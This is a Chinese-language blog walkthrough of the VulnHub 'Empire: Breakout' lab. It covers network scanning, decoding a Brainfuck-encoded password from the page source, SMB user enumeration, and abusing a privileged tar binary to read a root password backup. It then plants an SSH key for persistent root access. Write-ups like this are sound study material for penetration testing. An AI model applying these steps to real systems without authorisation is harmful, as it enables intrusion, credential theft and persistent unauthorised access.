VULNHUB 4 BREAKOUT - VULNHUB | Phut Hon = X_T = 天行健，君子以自强不息

靶机下载地址：https://www.vulnhub.com/entry/empire-breakout,751/
教程链接地址：https://readysetexploit.wordpress.com/2022/02/20/vulnhub-breakout/

# 确认攻击目标

攻击机 KALI： 192.168.31.135
靶机 NAPPING：桥接于 192.168.31.1 的网卡，ip 未知

通过 netdiscover 扫描当前网卡里边有哪些机器
sudo netdiscover -i eth0 -r 192.168.31.0/24

将所有已知的 ip 暂时存档，对这类 ip 地址不做端口扫描

# shell
cat > myip.txt << EOF
192.168.31.1 192.168.31.25 192.168.31.58 192.168.31.86 192.168.31.33
192.168.31.120 192.168.31.135 192.168.31.145 192.168.31.162 192.168.31.44
EOF

去除一些已知 ip 的机器，对剩余 IP 进行端口扫描，判断目标 IP
sudo nmap -PA 192.168.31.0/24 --excludefile myip.txt

-> 目标机器的 ip 地址： 192.168.31.127

# 端口扫描

sudo nmap -A -p 1-1024 192.168.31.127 -oN /tmp/breakout.txt

# Brainfuck 解密

打开网站：http://192.168.31.127

对此网站进行目录扫描
dirsearch -u http://192.168.31.127

审查源代码

1
2

# 找到加密的密码如下：
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++<------------.>>---------.<<++++++.++++++.

brainfuck 加密
此为 brainfuck 加密：https://ctf.bugku.com/tool/brainfuck

-> 某密码为 .2uqPEfj3D<P'a-3

# SMB 漏洞利用

1 2	# smbclient 枚举 smbclient -N -L 192.168.31.127

1 2	# smbclient 测试 smbclient //192.168.31.127/IPC$ -N

Enum4linux 是用于枚举 windows 和 Linux 系统上的 SMB 服务的工具。可以轻松的从与 SMB 有关的目标中快速提取信息。通常可以确信，如果打开了端口 139 和 445 ，则 SMB 正在运行。使用 Enum4linux 收集信息我们需要做的第一件事是确定目标上是否存在 SMB。

1 2	# 使用enum4linux 进行枚举SMB 信息 enum4linux -A 192.168.31.127

-> 得到一个用户名：cyber

# Tar 提权

登录服务器

1 2	ssh cyber@192.168.31.127 # Pass:.2uqPEfj3D<P'a-3

找到一个敏感命令 tar 可以用调用 root 权限

寻找敏感文件
ls /var/backups/ -Alh

利用 tar 及备份文件

# 利用具有root权限的tar去压缩这个备份文件里边的密码:
./tar -zcvf pass.tar.gz /var/backups/.old_pass.bak

# 进行解压：
tar -zxvf pass.tar.gz

# 查看解压之后的文件：
cat ./var/backups/.old_pass.bak

# 密码显示为：
Ts&4&YurgtRX(=~h

# SSH 密钥对维权

# 提前准备好配对好的私钥和公钥，将公钥发到靶机
scp parallels@192.168.31.135:~/.ssh/id_rsa.pub ~/.ssh/
cat ~/id_rsa.pub >> ~/authorized_keys
rm - f id_rsa.pub

1
2
3

# 用私钥登录
ll | grep id
ssh root@192.168.31.127 -i ~/.ssh/id_rsa

VULNHUB 1-10